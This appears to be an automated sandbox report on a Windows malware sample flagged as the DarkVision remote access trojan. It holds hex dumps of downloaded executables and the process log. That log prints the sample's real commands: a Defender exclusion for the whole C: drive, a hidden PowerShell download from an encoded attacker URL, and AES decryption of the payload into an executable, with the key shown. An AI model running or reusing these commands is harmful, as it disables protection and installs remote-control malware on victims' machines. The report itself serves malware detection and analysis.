                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 00 c7 44 24 20 00 00 00 00 4c 8d 4d c0 50 59 90 48 89 da 49 89 c0 e8 b2 0a 02 00 09 c0 0f 84 1c 01 00 00 48 8b 75 c0 e9 8d 00 00 00 49 89 dd 44 89 e8 83 e0 03 83 f8 01 75 39 49 8d 5d ff 4d 8b 75 ff 49 8b 7d 07 48 8b 07 48 85 c0 74 05 4c 89 f1 ff d0 48 83 7f 08 00 74 0c 48 8b 57 10 4c 89 f1 e8 2b d8 fe ff ba 08 00 00 00 53 90 59 e8 1e d8 fe ff 49 c7 04 24 00 00 00 00 48 81 c4 c8 04 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d c3 e8 89 0a 02 00 49 c7 04 24 00 00 00 00 48 89 d9 48 81 c4 c8 04 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d e9 e6 09 02 00 31 f6 48 c7 44 24 28 00 00 00 00 c7 44 24 20 00 00 00 00 56 59 90 31 d2 41 b8 02 00 00 00 45 31 c9 e8 d8 09 02 00 48 09 c0 74 4b 90 50 5f 49 c1 e7 20 4d 09 f7 4c 89 7c 24 20 90 50 59 ba 04 00 00 00 45 31 c0 45
                                                                                                          Data Ascii: D$ LMPYHIHuIDu9I]MuI}HHtLHtHWL+SYI$H[_^A\A]A^A_]I$HH[_^A\A]A^A_]1HD$(D$ VY1AE1HtKP_I ML|$ PYE1E
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 00 ba 08 01 00 00 e8 c6 9b fe ff 0f 0b eb 36 eb 34 48 89 c7 48 8d 8d c0 08 00 00 e8 f1 5d 00 00 e9 69 01 00 00 e8 17 c4 fe ff eb 19 48 89 c7 48 8d 8d d8 01 00 00 e8 36 95 00 00 e9 44 03 00 00 e8 fc c3 fe ff 48 89 c7 eb 24 48 89 c7 48 89 f1 e8 1c 95 00 00 e9 2a 03 00 00 e8 e2 c3 fe ff 48 89 c7 48 8d 8d 28 0b 00 00 e8 43 7b 00 00 48 8d 8d 10 05 00 00 e8 57 83 00 00 e9 0f 01 00 00 48 89 c7 e9 60 02 00 00 48 89 c7 48 8d 8d 08 0b 00 00 e8 7b 85 00 00 48 8b 8d c0 0c 00 00 48 8b 95 98 0c 00 00 e8 18 88 00 00 31 db eb 16 e8 8f c3 fe ff 48 89 c7 48 8d 8d e0 0b 00 00 e8 90 84 00 00 b3 01 45 31 ff 48 83 bd c8 0c 00 00 00 75 16 eb 25 e8 6a c3 fe ff 48 89 c7 b3 01 48 89 b5 70 0c 00 00 41 b7 01 ba 08 00 00 00 48 8b 8d 70 0c 00 00 e8 9a 97 fe ff f0 49 ff 4d 00 75
                                                                                                          Data Ascii: 64HH]iHH6DH$HH*HH(C{HWH`HH{HH1HHE1Hu%jHHpAHpIMu
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 49 8d 50 01 48 89 16 4c 89 5e 08 45 0f b6 00 83 f9 3f 75 bd 41 83 f8 7f 74 b7 45 09 c0 74 b2 b0 07 e9 a9 09 00 00 4d 09 db 48 8b 4d 00 0f 84 7c 02 00 00 31 ff 66 66 66 2e 0f 1f 84 00 00 00 00 00 80 3c 3a 00 0f 84 03 0a 00 00 48 ff c7 49 39 fb 75 ee e9 57 02 00 00 41 bb 09 00 00 00 31 c9 b0 01 e9 25 06 00 00 49 83 fb 02 0f 82 3e 02 00 00 49 83 c3 fe 48 8d 42 02 4c 8b 45 00 49 89 00 4d 89 58 08 0f b7 3a e9 17 02 00 00 4d 09 db 0f 84 1a 02 00 00 49 ff cb 48 8d 42 01 4c 8b 45 00 49 89 00 4d 89 58 08 0f b6 3a e9 f4 01 00 00 4d 09 db 0f 84 87 06 00 00 4e 8d 04 1a 49 ff cb 48 ff c2 31 c0 29 c9 0f b6 5a ff 83 f9 3f 75 09 80 fb 02 0f 83 ea 08 00 00 4d 89 d6 44 0f b6 d3 44 89 d6 83 e6 7f 48 d3 e6 48 09 f0 45 84 d2 0f 89 1c 0a 00 00 83 c1 07 48 ff c2 49 83 c3
                                                                                                          Data Ascii: IPHL^E?uAtEtMHM|1fff.<:HI9uWA1%I>IHBLEIMX:MIHBLEIMX:MNIH1)Z?uMDDHHEHI
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 03 00 00 90 57 59 e8 e8 a7 00 00 48 83 f8 01 0f 94 c0 48 81 fa 00 01 00 00 0f 92 c1 84 c8 74 53 88 56 08 b8 28 00 00 00 e9 73 03 00 00 90 57 59 e8 be a7 00 00 48 83 f8 01 0f 94 c0 48 81 fa 00 01 00 00 0f 92 c1 84 c8 74 29 88 56 08 b8 21 00 00 00 e9 49 03 00 00 90 57 59 e8 94 a7 00 00 48 83 f8 01 75 0e 48 89 56 08 b8 2d 00 00 00 e9 2d 03 00 00 48 8b 07 48 8d 0d 0a 86 01 00 48 63 04 81 48 01 c8 ff e0 48 8b 47 08 48 89 46 08 29 c0 e9 0b 03 00 00 48 8b 47 08 48 89 46 08 b8 16 00 00 00 e9 f9 02 00 00 48 8b 47 08 48 89 46 08 b8 17 00 00 00 e9 e7 02 00 00 48 8b 47 08 48 89 46 08 b8 0b 00 00 00 e9 d5 02 00 00 48 8b 47 08 e9 ee 02 00 00 48 8b 47 08 48 89 46 08 b8 15 00 00 00 e9 ba 02 00 00 48 8b 47 08 48 89 46 08 b8 10 00 00 00 e9 a8 02 00 00 48 8b 47 08 48 89 46
                                                                                                          Data Ascii: WYHHtSV(sWYHHt)V!IWYHuHV--HHHcHHGHF)HGHFHGHFHGHFHGHGHFHGHFHGHF
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 8b 01 49 83 f8 ff 0f 84 91 00 00 00 51 90 5e 49 8d 40 01 4b 8d 0c 00 48 39 c1 48 0f 47 c1 48 83 f8 05 bf 04 00 00 00 48 0f 43 f8 29 c9 ba 18 00 00 00 57 90 58 48 f7 e2 70 77 49 b9 f8 ff ff ff ff ff ff 7f 4c 39 c8 77 63 4d 85 c0 74 1b 48 8b 4e 08 49 c1 e0 03 4b 8d 14 40 48 89 4d d0 48 89 55 e0 b9 08 00 00 00 eb 02 29 c9 48 89 4d d8 48 8d 4d e8 4c 8d 4d d0 ba 08 00 00 00 49 89 c0 e8 df f7 fe ff 83 7d e8 01 74 1a 48 8b 45 f0 48 89 46 08 48 89 3e 48 83 c4 50 5f 5e 5d c3 29 c9 e8 cf da fd ff 48 8b 4d f0 48 8b 55 f8 e8 c2 da fd ff e8 bd da fd ff cc 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 56 57 48 83 ec 50 48 8d 6c 24 50 4c 8b 01 49 83 f8 ff 0f 84 91 00 00 00 51 5e 90 49 8d 40 01 4b 8d 0c 00 48 39 c1 48 0f 47 c1 48 83 f8 05 bf 04 00 00 00 48 0f 43 f8 31 c9 ba 48
                                                                                                          Data Ascii: IQ^I@KH9HGHHC)WXHpwIL9wcMtHNIK@HMHU)HMHMLMI}tHEHFH>HP_^])HMHUfff.UVWHPHl$PLIQ^I@KH9HGHHC1H


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449737154.216.20.2434437784C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-09 06:37:30 UTC171OUTGET /64.EXE HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                                                          Host: woo097878781.win
                                                                                                          2024-12-09 06:37:31 UTC274INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 09 Dec 2024 06:37:30 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 1021952
                                                                                                          Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "673b3307-f9800"
                                                                                                          X-Powered-By: PleskLin
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-12-09 06:37:31 UTC16110INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 48 87 75 ed 29 e9 26 ed 29 e9 26 ed 29 e9 26 f6 b4 77 26 e7 29 e9 26 e4 51 6e 26 ec 29 e9 26 e4 51 7a 26 fc 29 e9 26 ed 29 e8 26 4f 29 e9 26 f6 b4 42 26 d9 29 e9 26 f6 b4 43 26 90 29 e9 26 f6 b4 74 26 ec 29 e9 26 52 69 63 68 ed 29 e9 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ea e3 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 46 0d
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Hu)&)&)&w&)&Qn&)&Qz&)&)&O)&B&)&C&)&t&)&Rich)&PEd6g"F
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 24 60 ff 15 ba 16 0d 00 8b 44 24 68 39 44 24 48 0f 85 8d 01 00 00 48 c7 44 24 78 00 00 00 00 48 8d 15 8c 26 0d 00 48 8b 4c 24 70 e8 92 6b 00 00 48 89 44 24 78 48 83 7c 24 78 00 0f 84 62 01 00 00 48 8d 15 7a 26 0d 00 48 8b 4c 24 78 e8 70 6b 00 00 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 0f 84 3a 01 00 00 48 8b 84 24 80 00 00 00 48 83 c0 11 48 89 84 24 80 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 48 63 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 0f be 04 01 83 f8 22 74 12 8b 84 24 88 00 00 00 ff c0 89 84 24 88 00 00 00 eb d5 4c 8d 84 24 98 00 00 00 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 c3 ab 0b 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 0f 84 bd 00 00 00 48 8b 84 24 90 00 00 00 48 83 c0 05 48 89 84 24 b0 00 00 00 8b 84 24 98 00
                                                                                                          Data Ascii: $`D$h9D$HHD$xH&HL$pkHD$xH|$xbHz&HL$xpkH$H$:H$HH$$Hc$H$"t$$L$$H$H$H$H$HH$$
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 00 48 8d 8c 24 b8 00 00 00 e8 92 2d 00 00 8b 8c 24 38 01 00 00 48 63 94 24 f4 00 00 00 4c 8b 84 24 30 01 00 00 49 8d 14 50 48 89 94 24 10 01 00 00 4c 8b c8 4c 8d 05 45 f6 0c 00 8b d1 48 8b 84 24 10 01 00 00 48 8b c8 e8 43 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 8b 84 24 38 01 00 00 48 63 8c 24 f4 00 00 00 48 8b 94 24 30 01 00 00 48 8d 0c 4a 4c 8d 05 1b f6 0c 00 8b d0 e8 08 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 48 8d 8c 24 b8 00 00 00 e8 e9 2b 00 00 90 48 8d 8c 24 90 00 00 00 e8 db 2b 00 00 90 48 8d 4c 24 30 e8 d0 2b 00 00 90 48 8d 4c 24 60 e8 c5 2b 00 00 48 8b 8c 24 18 01 00 00 48 33 cc e8 b5 9e 0b 00 48 81 c4 28 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 48 89 54 24 10 48 89 4c
                                                                                                          Data Ascii: H$-$8Hc$L$0IPH$LLEH$HC$$$8Hc$H$0HJL$$H$+H$+HL$0+HL$`+H$H3H(LD$HT$HL
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 84 24 30 01 00 00 ff c0 89 84 24 30 01 00 00 48 63 84 24 30 01 00 00 48 83 f8 6a 0f 83 e6 00 00 00 83 bc 24 f0 0a 00 00 00 74 7a 48 63 84 24 30 01 00 00 48 8d 0d a8 b5 0d 00 4c 8d 8c 24 40 01 00 00 41 b8 08 00 00 00 8b 94 24 f0 0a 00 00 48 8b 0c c1 e8 da fc ff ff 48 8d 94 24 40 01 00 00 48 8b 4c 24 30 ff 15 f7 94 0c 00 48 89 84 24 c0 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 90 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c0 09 00 00 48 89 08 48 83 bc 24 c0 09 00 00 00 75 07 33 c0 e9 ff 13 00 00 eb 5d 48 63 84 24 30 01 00 00 48 8d 0d 2e b5 0d 00 48 8b 04 c1 48 83 c0 08 48 8b d0 48 8b 4c 24 30 ff 15 98 94 0c 00 48 89 84 24 c8 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 31 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c8 09 00 00 48 89 08 48 83 bc 24 c8 09 00 00 00 75 07 33 c0 e9 a0
                                                                                                          Data Ascii: $0$0Hc$0Hj$tzHc$0HL$@A$HH$@HL$0H$Hc$0HHH$HH$u3]Hc$0H.HHHHL$0H$Hc$0H1HH$HH$u3
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 1c 8b 44 24 14 99 83 e2 03 03 c2 c1 f8 02 8b 4c 24 1c 2b c8 8b c1 89 44 24 14 8b 44 24 14 05 f4 05 00 00 89 44 24 08 66 0f 6e 44 24 08 f3 0f e6 c0 f2 0f 5c 05 a1 eb 0c 00 f2 0f 5e 05 91 eb 0c 00 f2 0f 2c c0 89 44 24 0c 8b 44 24 0c 25 ff 7f 00 00 69 c0 ad 8e 00 00 99 b9 64 00 00 00 f7 f9 89 44 24 18 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 66 0f 6e c0 f3 0f e6 c0 f2 0f 5e 05 4a eb 0c 00 f2 0f 2c c0 89 04 24 66 0f 6e 04 24 f3 0f e6 c0 f2 0f 10 0d 32 eb 0c 00 f2 0f 59 c8 66 0f 28 c1 f2 0f 2c c0 89 44 24 10 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 2b 44 24 10 48 8b 4c 24 40 89 41 10 83 3c 24 0e 7d 0b 8b 04 24 ff c8 89 44 24 20 eb 0a 8b 04 24 83 e8 0d 89 44 24 20 48 8b 44 24 40 8b 4c 24 20 89 48 0c 48 8b 44 24 40 83 78 0c 02 7e 0f 8b 44 24 0c 2d 6c 12 00 00 89 44 24 24
                                                                                                          Data Ascii: D$L$+D$D$D$fnD$\^,D$D$%idD$D$L$+fn^J,$fn$2Yf(,D$D$L$++D$HL$@A<$}$D$ $D$ HD$@L$ HHD$@x~D$-lD$$
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 75 0a 48 8b 44 24 38 48 89 44 24 20 83 bc 24 0c 01 00 00 00 7c 37 c7 44 24 34 00 00 00 00 eb 0a 8b 44 24 34 ff c0 89 44 24 34 8b 84 24 0c 01 00 00 39 44 24 34 7d 14 48 63 44 24 34 48 8b 4c 24 38 0f be 04 01 85 c0 74 02 eb d5 eb 0e 48 8b 4c 24 38 e8 0b 15 00 00 89 44 24 34 e9 fb 04 00 00 0f b6 84 24 08 01 00 00 83 f8 0e 75 0d c7 84 24 f4 01 00 00 22 00 00 00 eb 0b c7 84 24 f4 01 00 00 27 00 00 00 0f b6 84 24 f4 01 00 00 88 84 24 70 01 00 00 0f b6 84 24 e0 00 00 00 85 c0 74 17 48 8b 8c 24 f0 00 00 00 e8 85 07 00 00 48 89 84 24 68 01 00 00 eb 28 48 8b 84 24 40 02 00 00 48 83 c0 08 48 89 84 24 40 02 00 00 48 8b 84 24 40 02 00 00 48 8b 40 f8 48 89 84 24 68 01 00 00 48 83 bc 24 68 01 00 00 00 75 0d c7 84 24 f8 01 00 00 01 00 00 00 eb 0b c7 84 24 f8 01 00 00 00
                                                                                                          Data Ascii: uHD$8HD$ $|7D$4D$4D$4$9D$4}HcD$4HL$8tHL$8D$4$u$"$'$$p$tH$H$h(H$@HH$@H$@H@H$hH$hu$$
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 48 8b 4c 24 38 4c 8b 49 30 4c 8d 05 b8 28 0d 00 8b d0 b9 0a 08 00 00 e8 14 ec ff ff 89 44 24 30 83 7c 24 40 02 7c 29 8b 05 3b 0c 0d 00 ff c0 48 8b 4c 24 38 48 83 c1 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b d0 e8 c0 fb ff ff 83 7c 24 68 00 75 11 83 7c 24 40 01 7c 0a 48 8b 4c 24 38 e8 48 fd ff ff 83 7c 24 40 03 7c 28 48 8b 44 24 38 48 83 c0 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b 15 d9 0b 0d 00 48 8b c8 e8 79 fb ff ff 48 8b 44 24 38 0f b6 4c 24 68 88 48 18 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                          Data Ascii: HL$8LI0L(D$0|$@|);HL$8HD$ AE3|$hu|$@|HL$8H|$@|(HD$8HD$ AE3HyHD$8L$hHD$0HXT$HL$3HT$HL$3
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 48 8b 44 24 60 48 63 40 08 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 38 48 8b 44 24 38 48 8b 4c 24 20 48 89 08 48 8b 44 24 38 48 83 c0 38 48 8b 4c 24 38 48 89 41 08 48 8b 44 24 38 c6 40 15 01 48 8b 44 24 38 c6 40 16 00 48 8b 44 24 38 48 8b 4c 24 60 48 8b 49 40 48 89 48 18 48 8b 44 24 60 48 8b 4c 24 38 48 89 48 40 48 8b 44 24 60 48 63 40 10 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 20 e9 60 ff ff ff 48 8b 44 24 60 48 83 78 40 00 74 0a c7 44 24 48 01 00 00 00 eb 08 c7 44 24 48 00 00 00 00 8b 44 24 48 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 48 c7 44 24 20 00 00 00 00 8b 05 25 8d 0d 00 39 44 24 40 0f 8f 92 00 00 00 48 8b 0d 30 8d 0d 00 e8 83 56 ff ff 48 8b 05 2c 8d 0d 00 48 89 44 24 20 48 83 7c 24
                                                                                                          Data Ascii: HD$`Hc@HL$ HHHD$8HD$8HL$ HHD$8H8HL$8HAHD$8@HD$8@HD$8HL$`HI@HHHD$`HL$8HH@HD$`Hc@HL$ HHHD$ `HD$`Hx@tD$HD$HD$HHXL$H8HD$ %9D$@H0VH,HD$ H|$
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: d2 8b 44 24 28 b9 08 00 00 00 f7 f1 8b c0 48 8b 4c 24 20 0f b6 44 01 10 8b 4c 24 28 83 e1 07 ba 01 00 00 00 d3 e2 8b ca 23 c1 85 c0 74 0a c7 44 24 08 01 00 00 00 eb 08 c7 44 24 08 00 00 00 00 8b 44 24 08 eb 68 eb 66 8b 44 24 28 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 8b 44 24 28 ff c0 89 44 24 28 8b 44 24 04 48 8b 4c 24 20 83 7c 81 10 00 74 35 8b 44 24 04 48 8b 4c 24 20 8b 54 24 28 39 54 81 10 75 07 b8 01 00 00 00 eb 1d 8b 44 24 04 ff c0 8b c0 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 eb bb 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 58 c7 44 24 20 00 00 00 00 48 8b 44 24 60 48 8b 40 20 48 89 44 24 28 48 8b 44 24 28 0f b6 40 09 83 f8 02 0f 84 a9 00 00 00 48 8b 4c 24 28 e8 75 01 00 00 89 44
                                                                                                          Data Ascii: D$(HL$ DL$(#tD$D$D$hfD$(3|HHD$D$(D$(D$HL$ |t5D$HL$ T$(9TuD$3|HHD$3HHL$HXD$ HD$`H@ HD$(HD$(@HL$(uD
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 10 48 8b 4c 24 28 48 8b 44 24 30 ff 90 00 01 00 00 48 8b 4c 24 28 e8 37 bc ff ff 48 8b 44 24 30 48 8b 48 70 e8 f9 a2 00 00 8b 44 24 20 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f bf 40 2e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f b6 40 09 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 7d 06 00 00 48 8b 44 24 30 0f bf 40 3c 85 c0 7c 26 48 8b 44 24 30 0f bf 40 3c 83 c0 03 8b d0 48 8b 4c 24 30 e8 28 00 00 00 b8 ff ff ff ff
                                                                                                          Data Ascii: HL$(HD$0HL$(7HD$0HHpD$ HHHL$HD$@.HL$HD$H@HHL$HD$H@HL$HD$@HL$H(HL$0}HD$0@<|&HD$0@<HL$0(


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x140000000
                                                                                                          File size:124'416 bytes
                                                                                                          MD5 hash:A3D68745E8919E2A48D8FA0738DA124E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:net session
                                                                                                          Imagebase:0x7ff7f29f0000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\net1 session
                                                                                                          Imagebase:0x7ff64eb30000
                                                                                                          File size:183'808 bytes
                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:01:37:01
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:01:37:13
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                                          Imagebase:0x7ff643710000
                                                                                                          File size:32'768 bytes
                                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:01:37:23
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
